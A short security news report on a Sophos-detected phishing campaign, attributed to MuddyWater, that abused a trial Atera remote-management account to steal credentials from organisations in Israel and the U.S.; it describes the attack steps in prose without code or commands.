Sophos Managed Detection and Response (MDR) team has uncovered a new cyber campaign that employs sophisticated phishing techniques to deploy legitimate remote management software for malicious purposes. The security firm believes this operation is connected to an Iranian threat group known as MuddyWater (TA450).
The attack campaign was first detected in November when Sophos security systems blocked suspicious credential-stealing activity targeting an organization in Israel. A similar incident was later observed affecting a U.S.-based customer.
The attackers' strategy involves sending phishing emails that direct victims to download what appears to be a shared document from onehub.com. The downloaded file, labeled "New Program ICC LTD.zip," contains an installer for Atera, a legitimate remote monitoring and management (RMM) tool.
The threat actors utilized a trial account of Atera, likely created using a compromised email address, to execute malicious PowerShell scripts designed to extract user credentials and create backup copies of system registry files.
Post-installation activities included:
- Multiple attempts to gather domain information
- Creation of SSH tunnels
- Installation of additional remote management tools
The attackers also attempted to deploy Level RMM, another remote management solution, through obfuscated PowerShell commands.
Sophos security systems successfully detected and blocked these malicious activities through their behavioral monitoring rules. The company continues to track this threat cluster and monitor for similar attack patterns.
This incident highlights the growing trend of cybercriminals leveraging legitimate software tools for unauthorized system access and data theft. Organizations are advised to maintain strong email security practices and monitor for unauthorized installation of remote management software.